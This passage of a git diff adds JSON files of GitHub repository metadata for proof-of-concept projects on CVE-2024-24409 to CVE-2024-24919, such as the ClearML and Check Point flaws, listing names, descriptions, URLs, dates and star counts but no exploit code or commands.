"id": 76125965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76125965?v=4", + "html_url": "https:\/\/github.com\/passtheticket", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/passtheticket\/CVE-2024-24409", + "description": "ADManager Plus Build < 7210 Elevation of Privilege Vulnerability", + "fork": false, + "created_at": "2024-09-28T15:00:55Z", + "updated_at": "2024-11-29T20:39:39Z", + "pushed_at": "2024-11-29T20:39:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24488.json b/2024/CVE-2024-24488.json new file mode 100644 index 0000000000..2010215c87 --- /dev/null +++ b/2024/CVE-2024-24488.json @@ -0,0 +1,33 @@ +[ + { + "id": 751143948, + "name": "CVE-2024-24488", + "full_name": "minj-ae\/CVE-2024-24488", + "owner": { + "login": "minj-ae", + "id": 65323308, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65323308?v=4", + "html_url": "https:\/\/github.com\/minj-ae", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/minj-ae\/CVE-2024-24488", + "description": "An issue in Shenzen Tenda Technology CP3V2.0 V11.10.00.2311090948 allows a local attacker to obtain sensitive information via the password component.", + "fork": false, + "created_at": "2024-02-01T02:29:19Z", + "updated_at": "2024-04-29T01:38:24Z", + "pushed_at": "2024-02-07T21:22:27Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24549.json b/2024/CVE-2024-24549.json new file mode 100644 index 0000000000..aaf9657cd9 --- /dev/null +++ b/2024/CVE-2024-24549.json @@ -0,0 +1,64 @@ +[ + { + "id": 837384219, + "name": "CVE-2024-24549", + "full_name": "Abdurahmon3236\/CVE-2024-24549", + "owner": { + "login": "Abdurahmon3236", + "id": 76862934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76862934?v=4", + "html_url": "https:\/\/github.com\/Abdurahmon3236", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdurahmon3236\/CVE-2024-24549", + "description": null, + "fork": false, + "created_at": "2024-08-02T21:05:34Z", + "updated_at": "2024-12-09T05:12:31Z", + "pushed_at": "2024-09-01T14:10:12Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 900584602, + "name": "CVE-2024-24549", + "full_name": "JFOZ1010\/CVE-2024-24549", + "owner": { + "login": "JFOZ1010", + "id": 82562585, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82562585?v=4", + "html_url": "https:\/\/github.com\/JFOZ1010", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JFOZ1010\/CVE-2024-24549", + "description": "Proof of concept of the CVE-2024-24549, Exploit in Python. ", + "fork": false, + "created_at": "2024-12-09T04:59:07Z", + "updated_at": "2024-12-16T23:48:16Z", + "pushed_at": "2024-12-16T23:48:12Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24576.json b/2024/CVE-2024-24576.json new file mode 100644 index 0000000000..4bc3717a77 --- /dev/null +++ b/2024/CVE-2024-24576.json @@ -0,0 +1,286 @@ +[ + { + "id": 784438166, + "name": "CVE-2024-24576-PoC", + "full_name": "frostb1ten\/CVE-2024-24576-PoC", + "owner": { + "login": "frostb1ten", + "id": 68353531, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68353531?v=4", + "html_url": "https:\/\/github.com\/frostb1ten", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/frostb1ten\/CVE-2024-24576-PoC", + "description": "Example of CVE-2024-24576 use case.", + "fork": false, + "created_at": "2024-04-09T21:17:15Z", + "updated_at": "2024-11-20T16:30:44Z", + "pushed_at": "2024-04-10T14:46:42Z", + "stargazers_count": 56, + "watchers_count": 56, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 56, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 784676322, + "name": "CVE-2024-24576-PoC-Python", + "full_name": "brains93\/CVE-2024-24576-PoC-Python", + "owner": { + "login": "brains93", + "id": 60553334, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60553334?v=4", + "html_url": "https:\/\/github.com\/brains93", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brains93\/CVE-2024-24576-PoC-Python", + "description": null, + "fork": false, + "created_at": "2024-04-10T10:27:55Z", + "updated_at": "2024-11-20T16:30:44Z", + "pushed_at": "2024-04-12T09:22:40Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 784763809, + "name": "CVE-2024-24576-Exploit", + "full_name": "aydinnyunus\/CVE-2024-24576-Exploit", + "owner": { + "login": "aydinnyunus", + "id": 52822869, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52822869?v=4", + "html_url": "https:\/\/github.com\/aydinnyunus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aydinnyunus\/CVE-2024-24576-Exploit", + "description": "CVE-2024-24576 Proof of Concept", + "fork": false, + "created_at": "2024-04-10T14:06:09Z", + "updated_at": "2024-11-20T16:30:44Z", + "pushed_at": "2024-04-10T14:42:34Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "1-day", + "exploit", + "rust", + "security" + ], + "visibility": "public", + "forks": 4, + "watchers": 19, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 785163065, + "name": "CVE-2024-24576-PoC---Nim", + "full_name": "foxoman\/CVE-2024-24576-PoC---Nim", + "owner": { + "login": "foxoman", + "id": 5356677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5356677?v=4", + "html_url": "https:\/\/github.com\/foxoman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/foxoman\/CVE-2024-24576-PoC---Nim", + "description": "CVE-2024-24576 PoC for Nim Lang", + "fork": false, + "created_at": "2024-04-11T10:22:10Z", + "updated_at": "2024-08-02T21:50:14Z", + "pushed_at": "2024-04-11T11:27:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 785926402, + "name": "batbadbut-demo", + "full_name": "corysabol\/batbadbut-demo", + "owner": { + "login": "corysabol", + "id": 4594324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4594324?v=4", + "html_url": "https:\/\/github.com\/corysabol", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/corysabol\/batbadbut-demo", + "description": "This is a simple demo for the BadBatBut vulnerability CVE-2024-24576", + "fork": false, + "created_at": "2024-04-12T23:36:05Z", + "updated_at": "2024-04-26T12:20:52Z", + "pushed_at": "2024-04-18T04:24:32Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786291689, + "name": "CVE-2024-24576-PoC-Python", + "full_name": "mishl-dev\/CVE-2024-24576-PoC-Python", + "owner": { + "login": "mishl-dev", + "id": 91066601, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91066601?v=4", + "html_url": "https:\/\/github.com\/mishl-dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mishl-dev\/CVE-2024-24576-PoC-Python", + "description": "https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2024-24576", + "fork": false, + "created_at": "2024-04-14T02:10:55Z", + "updated_at": "2024-07-09T09:14:41Z", + "pushed_at": "2024-04-14T02:30:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 786321565, + "name": "CVE-2024-24576.jl", + "full_name": "lpn\/CVE-2024-24576.jl", + "owner": { + "login": "lpn", + "id": 619560, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/619560?v=4", + "html_url": "https:\/\/github.com\/lpn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lpn\/CVE-2024-24576.jl", + "description": "Simple CVE-2024-24576 PoC in Julia", + "fork": false, + "created_at": "2024-04-14T05:00:18Z", + "updated_at": "2024-04-14T07:51:08Z", + "pushed_at": "2024-04-14T08:39:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 789510981, + "name": "CVE-2024-24576-PoC-Rust", + "full_name": "Gaurav1020\/CVE-2024-24576-PoC-Rust", + "owner": { + "login": "Gaurav1020", + "id": 81969930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81969930?v=4", + "html_url": "https:\/\/github.com\/Gaurav1020", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Gaurav1020\/CVE-2024-24576-PoC-Rust", + "description": null, + "fork": false, + "created_at": "2024-04-20T18:54:00Z", + "updated_at": "2024-04-20T18:59:01Z", + "pushed_at": "2024-04-20T18:58:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 789761052, + "name": "CVE-2024-24576-PoC-BatBadBut", + "full_name": "SheL3G\/CVE-2024-24576-PoC-BatBadBut", + "owner": { + "login": "SheL3G", + "id": 76014923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76014923?v=4", + "html_url": "https:\/\/github.com\/SheL3G", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SheL3G\/CVE-2024-24576-PoC-BatBadBut", + "description": "PoC for CVE-2024-24576 vulnerability \"BatBadBut\"", + "fork": false, + "created_at": "2024-04-21T13:42:28Z", + "updated_at": "2024-04-21T17:57:34Z", + "pushed_at": "2024-04-21T17:57:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24590.json b/2024/CVE-2024-24590.json new file mode 100644 index 0000000000..6a201b2152 --- /dev/null +++ b/2024/CVE-2024-24590.json @@ -0,0 +1,219 @@ +[ + { + "id": 813864710, + "name": "ClearML-CVE-2024-24590", + "full_name": "OxyDeV2\/ClearML-CVE-2024-24590", + "owner": { + "login": "OxyDeV2", + "id": 46215222, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46215222?v=4", + "html_url": "https:\/\/github.com\/OxyDeV2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OxyDeV2\/ClearML-CVE-2024-24590", + "description": "Proof of concept for CVE-2024-24590", + "fork": false, + "created_at": "2024-06-11T22:30:26Z", + "updated_at": "2024-06-14T20:13:28Z", + "pushed_at": "2024-06-13T11:33:29Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814871568, + "name": "CVE-2024-24590-ClearML-RCE-Exploit", + "full_name": "xffsec\/CVE-2024-24590-ClearML-RCE-Exploit", + "owner": { + "login": "xffsec", + "id": 162821824, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162821824?v=4", + "html_url": "https:\/\/github.com\/xffsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xffsec\/CVE-2024-24590-ClearML-RCE-Exploit", + "description": null, + "fork": false, + "created_at": "2024-06-13T22:17:57Z", + "updated_at": "2024-10-01T15:22:55Z", + "pushed_at": "2024-06-13T22:20:15Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815490192, + "name": "CVE-2024-24590-ClearML-RCE-CMD-POC", + "full_name": "diegogarciayala\/CVE-2024-24590-ClearML-RCE-CMD-POC", + "owner": { + "login": "diegogarciayala", + "id": 84715095, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84715095?v=4", + "html_url": "https:\/\/github.com\/diegogarciayala", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/diegogarciayala\/CVE-2024-24590-ClearML-RCE-CMD-POC", + "description": "CVE-2024-24590 ClearML RCE&CMD POC", + "fork": false, + "created_at": "2024-06-15T10:09:51Z", + "updated_at": "2024-11-20T16:30:49Z", + "pushed_at": "2024-06-15T11:09:13Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 817754834, + "name": "CVE-2024-24590", + "full_name": "junnythemarksman\/CVE-2024-24590", + "owner": { + "login": "junnythemarksman", + "id": 20056452, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20056452?v=4", + "html_url": "https:\/\/github.com\/junnythemarksman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/junnythemarksman\/CVE-2024-24590", + "description": "Deserialization of untrusted data can occur in versions 0.17.0 to 1.14.2 of the client SDK of Allegro AI’s ClearML platform, enabling a maliciously uploaded artifact to run arbitrary code on an end user’s system when interacted with.", + "fork": false, + "created_at": "2024-06-20T11:23:56Z", + "updated_at": "2024-10-06T20:48:49Z", + "pushed_at": "2024-06-21T00:52:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 831603638, + "name": "ClearML-CVE-2024-24590-RCE", + "full_name": "sviim\/ClearML-CVE-2024-24590-RCE", + "owner": { + "login": "sviim", + "id": 172663851, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172663851?v=4", + "html_url": "https:\/\/github.com\/sviim", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sviim\/ClearML-CVE-2024-24590-RCE", + "description": "With this script you can exploit the CVE-2024-24590", + "fork": false, + "created_at": "2024-07-21T04:16:24Z", + "updated_at": "2024-11-20T16:30:57Z", + "pushed_at": "2024-07-21T04:48:47Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 840977646, + "name": "cve-2024-24590", + "full_name": "Bigb972003\/cve-2024-24590", + "owner": { + "login": "Bigb972003", + "id": 139943997, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/139943997?v=4", + "html_url": "https:\/\/github.com\/Bigb972003", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Bigb972003\/cve-2024-24590", + "description": null, + "fork": false, + "created_at": "2024-08-11T09:21:08Z", + "updated_at": "2024-08-11T09:21:08Z", + "pushed_at": "2024-08-11T09:21:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 869071531, + "name": "CVE-2024-24590", + "full_name": "j3r1ch0123\/CVE-2024-24590", + "owner": { + "login": "j3r1ch0123", + "id": 110147529, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110147529?v=4", + "html_url": "https:\/\/github.com\/j3r1ch0123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/j3r1ch0123\/CVE-2024-24590", + "description": "Created this exploit for the Hack The Box machine, Blurry.", + "fork": false, + "created_at": "2024-10-07T17:07:10Z", + "updated_at": "2024-10-07T17:18:24Z", + "pushed_at": "2024-10-07T17:18:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24684.json b/2024/CVE-2024-24684.json new file mode 100644 index 0000000000..3090d31259 --- /dev/null +++ b/2024/CVE-2024-24684.json @@ -0,0 +1,33 @@ +[ + { + "id": 873286914, + "name": "CVE-2024-24684", + "full_name": "SpiralBL0CK\/CVE-2024-24684", + "owner": { + "login": "SpiralBL0CK", + "id": 25670930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4", + "html_url": "https:\/\/github.com\/SpiralBL0CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpiralBL0CK\/CVE-2024-24684", + "description": "Crash File ( Poc for CVE-2024-24684)", + "fork": false, + "created_at": "2024-10-15T23:04:32Z", + "updated_at": "2024-10-15T23:05:12Z", + "pushed_at": "2024-10-15T23:05:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24685.json b/2024/CVE-2024-24685.json new file mode 100644 index 0000000000..57eed979b3 --- /dev/null +++ b/2024/CVE-2024-24685.json @@ -0,0 +1,33 @@ +[ + { + "id": 873290083, + "name": "CVE-2024-24685", + "full_name": "SpiralBL0CK\/CVE-2024-24685", + "owner": { + "login": "SpiralBL0CK", + "id": 25670930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4", + "html_url": "https:\/\/github.com\/SpiralBL0CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpiralBL0CK\/CVE-2024-24685", + "description": "Crash File ( Poc for CVE-2024-24685)", + "fork": false, + "created_at": "2024-10-15T23:16:05Z", + "updated_at": "2024-10-15T23:16:35Z", + "pushed_at": "2024-10-15T23:16:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24686.json b/2024/CVE-2024-24686.json new file mode 100644 index 0000000000..7981c62316 --- /dev/null +++ b/2024/CVE-2024-24686.json @@ -0,0 +1,33 @@ +[ + { + "id": 873291160, + "name": "CVE-2024-24686", + "full_name": "SpiralBL0CK\/CVE-2024-24686", + "owner": { + "login": "SpiralBL0CK", + "id": 25670930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4", + "html_url": "https:\/\/github.com\/SpiralBL0CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpiralBL0CK\/CVE-2024-24686", + "description": "Crash File ( Poc for CVE-2024-24686)", + "fork": false, + "created_at": "2024-10-15T23:20:34Z", + "updated_at": "2024-10-16T08:47:37Z", + "pushed_at": "2024-10-15T23:20:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24725.json b/2024/CVE-2024-24725.json new file mode 100644 index 0000000000..e72493732a --- /dev/null +++ b/2024/CVE-2024-24725.json @@ -0,0 +1,33 @@ +[ + { + "id": 877945371, + "name": "CVE-2024-24725-PoC", + "full_name": "MelkorW\/CVE-2024-24725-PoC", + "owner": { + "login": "MelkorW", + "id": 144314304, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144314304?v=4", + "html_url": "https:\/\/github.com\/MelkorW", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MelkorW\/CVE-2024-24725-PoC", + "description": null, + "fork": false, + "created_at": "2024-10-24T14:07:47Z", + "updated_at": "2024-10-25T07:04:17Z", + "pushed_at": "2024-10-24T14:08:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24760.json b/2024/CVE-2024-24760.json new file mode 100644 index 0000000000..feea4a9aad --- /dev/null +++ b/2024/CVE-2024-24760.json @@ -0,0 +1,33 @@ +[ + { + "id": 766707015, + "name": "CVE-2024-24760", + "full_name": "killerbees19\/CVE-2024-24760", + "owner": { + "login": "killerbees19", + "id": 21372289, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21372289?v=4", + "html_url": "https:\/\/github.com\/killerbees19", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/killerbees19\/CVE-2024-24760", + "description": "mailcow: Docker Container Exposure to Local Network", + "fork": false, + "created_at": "2024-03-04T00:53:35Z", + "updated_at": "2024-03-04T00:53:35Z", + "pushed_at": "2024-03-04T00:54:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24787.json b/2024/CVE-2024-24787.json new file mode 100644 index 0000000000..9e14a85b4a --- /dev/null +++ b/2024/CVE-2024-24787.json @@ -0,0 +1,33 @@ +[ + { + "id": 798649279, + "name": "CVE-2024-24787-PoC", + "full_name": "LOURC0D3\/CVE-2024-24787-PoC", + "owner": { + "login": "LOURC0D3", + "id": 83567597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83567597?v=4", + "html_url": "https:\/\/github.com\/LOURC0D3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LOURC0D3\/CVE-2024-24787-PoC", + "description": "CVE-2024-24787 Proof of Concept", + "fork": false, + "created_at": "2024-05-10T07:45:51Z", + "updated_at": "2024-11-20T16:30:46Z", + "pushed_at": "2024-05-10T08:03:50Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24809.json b/2024/CVE-2024-24809.json new file mode 100644 index 0000000000..f076fdd620 --- /dev/null +++ b/2024/CVE-2024-24809.json @@ -0,0 +1,33 @@ +[ + { + "id": 851552545, + "name": "CVE-2024-24809-Proof-of-concept", + "full_name": "gh-ost00\/CVE-2024-24809-Proof-of-concept", + "owner": { + "login": "gh-ost00", + "id": 153366162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153366162?v=4", + "html_url": "https:\/\/github.com\/gh-ost00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gh-ost00\/CVE-2024-24809-Proof-of-concept", + "description": "Critical Flaws in Traccar GPS System Expose Users to Remote Attacks", + "fork": false, + "created_at": "2024-09-03T09:56:13Z", + "updated_at": "2024-09-07T03:28:57Z", + "pushed_at": "2024-09-03T10:14:44Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24816.json b/2024/CVE-2024-24816.json new file mode 100644 index 0000000000..dba9476125 --- /dev/null +++ b/2024/CVE-2024-24816.json @@ -0,0 +1,33 @@ +[ + { + "id": 755475889, + "name": "CVE-2024-24816", + "full_name": "afine-com\/CVE-2024-24816", + "owner": { + "login": "afine-com", + "id": 105647610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105647610?v=4", + "html_url": "https:\/\/github.com\/afine-com", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afine-com\/CVE-2024-24816", + "description": "CKEditor 4 < 4.24.0-lts - XSS vulnerability in samples that use the \"preview\" feature.", + "fork": false, + "created_at": "2024-02-10T10:26:35Z", + "updated_at": "2024-05-22T14:25:57Z", + "pushed_at": "2024-02-10T10:32:59Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24919.json b/2024/CVE-2024-24919.json new file mode 100644 index 0000000000..231a53fb89 --- /dev/null +++ b/2024/CVE-2024-24919.json @@ -0,0 +1,1769 @@ +[ + { + "id": 808011196, + "name": "CVE-2024-24919", + "full_name": "c3rrberu5\/CVE-2024-24919", + "owner": { + "login": "c3rrberu5", + "id": 109983457, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109983457?v=4", + "html_url": "https:\/\/github.com\/c3rrberu5", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c3rrberu5\/CVE-2024-24919", + "description": "Nuclei Template to discover CVE-2024-24919. A path traversal vulnerability in CheckPoint SSLVPN.", + "fork": false, + "created_at": "2024-05-30T07:55:53Z", + "updated_at": "2024-11-20T16:30:48Z", + "pushed_at": "2024-05-30T07:58:10Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808179001, + "name": "CVE-2024-24919", + "full_name": "emanueldosreis\/CVE-2024-24919", + "owner": { + "login": "emanueldosreis", + "id": 5330737, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5330737?v=4", + "html_url": "https:\/\/github.com\/emanueldosreis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/emanueldosreis\/CVE-2024-24919", + "description": "POC exploit for CVE-2024-24919 information leakage ", + "fork": false, + "created_at": "2024-05-30T14:41:32Z", + "updated_at": "2024-11-20T16:30:48Z", + "pushed_at": "2024-05-30T18:56:32Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808207791, + "name": "CVE-2024-24919", + "full_name": "hendprw\/CVE-2024-24919", + "owner": { + "login": "hendprw", + "id": 128204375, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128204375?v=4", + "html_url": "https:\/\/github.com\/hendprw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hendprw\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-05-30T15:40:11Z", + "updated_at": "2024-05-30T15:42:26Z", + "pushed_at": "2024-05-30T15:42:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + 